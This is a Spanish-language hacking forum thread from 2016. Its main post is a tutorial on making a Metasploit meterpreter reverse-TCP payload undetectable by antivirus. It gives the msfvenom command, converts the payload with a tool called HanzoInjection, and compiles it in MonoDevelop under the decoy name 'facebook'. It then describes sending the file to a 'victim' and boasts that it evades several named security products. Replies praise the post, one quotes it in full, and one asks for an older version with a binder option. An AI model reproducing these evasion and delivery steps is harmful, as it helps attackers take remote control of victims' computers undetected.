Burlando AV mediante HanzoInyection

Iniciado por BrowserNet, Abril 19, 2016, 06:46:55 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Abril 19, 2016, 06:46:55 PM Ultima modificación: Abril 19, 2016, 07:39:11 PM por rollth
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,




Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin



ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:





Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# wine HanzoInjection.exe



Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs



root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# leafpad meterpreter.cs



Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~#monodevelop



Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.



Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs



Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml



Nos iremos a la pestaña "Referencias" > Editar



Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"



Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:




Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)





lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.



Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.



Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:



Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.



Gracias por visitar este POST.

muy bueno y simple tu post browsernet,gracias por el aporte. Lo voy a tratar en par de dias a ver que tal hermano

muy bueno el post ... lo probare... +10 gracias por compartir el segundo bien mas preciado del universo ... EL CONOCIMIENTO

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,




Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin



ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:





Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# wine HanzoInjection.exe



Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs



root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/hanzoInjection# leafpad meterpreter.cs



Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~#monodevelop



Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.



Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs



Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml



Nos iremos a la pestaña "Referencias" > Editar



Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"



Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:




Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)





lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.



Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.



Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:



Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.



Gracias por visitar este POST.

thanks alot but the new source in github has not binder option -b
can any one please to upload the old one ?